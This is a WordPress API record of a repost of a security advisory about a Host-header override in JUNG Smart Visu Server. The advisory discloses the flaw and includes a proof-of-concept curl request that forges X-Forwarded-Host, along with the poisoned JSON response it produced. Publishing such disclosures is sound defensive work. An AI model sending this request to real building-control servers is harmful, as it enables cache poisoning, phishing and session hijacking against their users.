{"id":40536,"date":"2026-02-11T21:32:35","date_gmt":"2026-02-11T21:32:35","guid":{"rendered":"http:\/\/localhost\/?p=40536"},"modified":"2026-02-11T21:32:35","modified_gmt":"2026-02-11T21:32:35","slug":"jung-smart-visu-server-111050-request-url-override","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40536","title":{"rendered":"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970"},"content":{"rendered":"

{“lastseen”:”2026-02-12T03:15:25″,”description”:”Title: JUNG Smart Visu Server 1.1.1050 Request URL Override Advisory ID: ZSL-2026-5970 Type: Local\/Remote Impact: Cross-Site Scripting, Spoofing Risk: 4\/5 Release Date: 12.02.2026 Summary The Smart Visu Server makes your intelligent building control…”,”published”:”2026-02-12T00:00:00″,”modified”:”2026-02-12T00:00:00″,”type”:”zeroscience”,”title”:”JUNG Smart Visu Server 1.1.1050 Request URL Override”,”source”:””,”references”:””,”id”:”ZSL-2026-5970″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”\\u003chtml\\u003e\\u003cbody\\u003e\\u003cp\\u003eJUNG Smart Visu Server 1.1.1050 Request URL Override\\r\\n\\r\\n\\r\\nVendor: ALBRECHT JUNG GMBH \\u0026amp; CO. KG\\r\\nProduct web page: https:\/\/www.jung-group.com | https:\/\/www.jung.de\\r\\nAffected version: 1.1.1050\\r\\n 1.0.905\\r\\n 1.0.832\\r\\n 1.0.830\\r\\n\\r\\nSummary: The Smart Visu Server makes your intelligent building\\r\\ncontrol convenient. With the user-friendly operating concept,\\r\\nyou can control both the KNX system and other systems such as\\r\\nPhilips Hue or Sonos on your mobile devices. You can likewise\\r\\nconnect voice control to your KNX system with Amazon Alexa or\\r\\nGoogle Assistant via the Smart Visu Server.\\r\\n\\r\\nDesc: The vulnerability enables unauthenticated attackers to perform\\r\\ncache poisoning attacks by overriding the effective host in proxied\\r\\nrequests through manipulation of the ‘X-Forwarded-Host’ header. When\\r\\na malicious actor sends a request with an arbitrary value, the backend\\r\\napplication or proxy fails to properly validate or sanitize this header,\\r\\nresulting in the generation of responses that incorporate the injected\\r\\nhost as legitimate URLs or links, redirecting to the attacker’s controlled\\r\\ndomain. This can lead to persistent cache poisoning, where the tainted\\r\\ncontent is stored and served to unsuspecting users, facilitating phishing,\\r\\nsession hijacking, or the distribution of malicious payloads.\\r\\n\\r\\nTested on: Jetty(9.2.12.v20150709)\\r\\n\\r\\n\\r\\nVulnerability discovered by Gjoko ‘LiquidWorm’ Krstic\\r\\n @zeroscience\\r\\n\\r\\n\\r\\nAdvisory ID: ZSL-2026-5970\\r\\nAdvisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2026-5970.php\\r\\n\\r\\n\\r\\n07.02.2026\\r\\n\\r\\n–\\r\\n\\r\\n\\r\\n$ curl \\”http:\/\/10.0.0.16:8080\/rest\/items?2sdh5r6txj=1\\” \\\\\\r\\n -H \\”User-Agent: thricer-engine\/1.6\\” \\\\\\r\\n -H \\”X-Forwarded-Host: sillysec.com\\”\\r\\n\\r\\nHTTP\/1.1 200 OK\\r\\nContent-Type: application\/json\\r\\nConnection: close\\r\\n\\r\\n[{\\”link\\”:\\”http:\/\/sillysec.com\/rest\/items\/knxcom_action_2019829213754373\\”,\\”state\\”:\\”NULL\\”,\\”type\\”:\\”SwitchItem\\”,\\”name\\”:\\”knxcom_action_2019829213754373\\”,\\”label\\”:\\”Timer_ON\\”,\\”tags\\”:[\\”knxcommissioning\\”,\\”knxcom_action\\”,\\”{\\\\\\”knxcom_action\\\\\\”:\\\\\\”knxcom_action\\\\\\”,\\\\\\”actionType\\\\\\”:\\\\\\”time\\\\\\”,\\\\\\”function_states\\\\\\”:[{\\\\\\”function_name\\\\\\”:\\\\\\”knxcom_function_201817101939842\\\\\\”,\\\\\\”channel_states\\\\\\”:[{\\\\\\”channel_index\\\\\\”:0,\\\\\\”channel_commands\\\\\\”:{\\\\\\”OnOffType\\\\\\”:\\\\\\”ON\\\\\\”}}]},{\\\\\\”function_name\\\\\\”:\\\\\\”knxcom_function_2017919141856124\\\\\\”,\\\\\\”channel_states\\\\\\”:[{\\\\\\”channel_index\\\\\\”:0,\\\\\\”channel_commands\\\\\\”:{\\\\\\”OnOffType\\\\\\”:\\\\\\”ON\\\\\\”}}]},{\\\\\\”function_name\\\\\\”:\\\\\\”knxcom_function_2017919144055744\\\\\\”,\\\\\\”channel_states\\\\\\”:[{\\\\\\”channel_index\\\\\\”:0,\\\\\\”channel_commands\\\\\\”:{\\\\\\”OnOffType\\\\\\”:\\\\\\”ON\\\\\\”}}]}],\\\\\\”icon\\\\\\”:\\\\\\”schaltuhr\\\\\\”,\\\\\\”sortindex\\\\\\”:{\\\\\\”generic\\\\\\”:3},\\\\\\”timer\\\\\\”:{\\\\\\”time\\\\\\”:\\\\\\”16:0\\\\\\”,\\\\\\”weekdays\\\\\\”:{\\\\\\”1\\\\\\”:true,\\\\\\”2\\\\\\”:true,\\\\\\”3\\\\\\”:true,\\\\\\”4\\\\\\”:true,\\\\\\”5\\\\\\”:true,\\\\\\”6\\\\\\”:true,\\\\\\”7\\\\\\”:true}}}\\”],\\”groupNames\\”:[\\”knxcom_group_201982922375216\\”]},{\\”link\\”:\\r\\n…\\r\\n…\\r\\n\\u003c\/p\\u003e\\u003c\/body\\u003e\\u003c\/html\\u003e”,”sourceHref”:”http:\/\/zeroscience.mk\/codes\/jung_cache.txt”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”http:\/\/zeroscience.mk\/en\/vulnerabilities\/ZSL-2026-5970.php”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-12T03:15:25″,”description”:”Title: JUNG Smart Visu Server 1.1.1050 Request URL Override Advisory ID: ZSL-2026-5970 Type: Local\/Remote Impact: Cross-Site Scripting, Spoofing Risk: 4\/5 Release Date: 12.02.2026 Summary The…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,7,11,5,107],"class_list":["post-40536","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability","tag-zeroscience"],"yoast_head":"\nJUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40536\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-12T03:15:25″,”description”:”Title: JUNG Smart Visu Server 1.1.1050 Request URL Override Advisory ID: ZSL-2026-5970 Type: Local\/Remote Impact: Cross-Site Scripting, Spoofing Risk: 4\/5 Release Date: 12.02.2026 Summary The...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40536\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-11T21:32:35+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40536#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40536\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970\",\"datePublished\":\"2026-02-11T21:32:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40536\"},\"wordCount\":573,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\",\"zeroscience\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40536#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40536\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40536\",\"name\":\"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-11T21:32:35+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40536#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40536\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40536#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40536","og_locale":"en_US","og_type":"article","og_title":"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970 - zero redgem","og_description":"{“lastseen”:”2026-02-12T03:15:25″,”description”:”Title: JUNG Smart Visu Server 1.1.1050 Request URL Override Advisory ID: ZSL-2026-5970 Type: Local\/Remote Impact: Cross-Site Scripting, Spoofing Risk: 4\/5 Release Date: 12.02.2026 Summary The...","og_url":"https:\/\/zero.redgem.net\/?p=40536","og_site_name":"zero redgem","article_published_time":"2026-02-11T21:32:35+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40536#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40536"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970","datePublished":"2026-02-11T21:32:35+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40536"},"wordCount":573,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","Security","tapic","Vulnerability","zeroscience"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40536#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40536","url":"https:\/\/zero.redgem.net\/?p=40536","name":"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-11T21:32:35+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40536#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40536"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40536#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"JUNG Smart Visu Server 1.1.1050 Request URL Override_ZSL-2026-5970"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40536"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40536\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}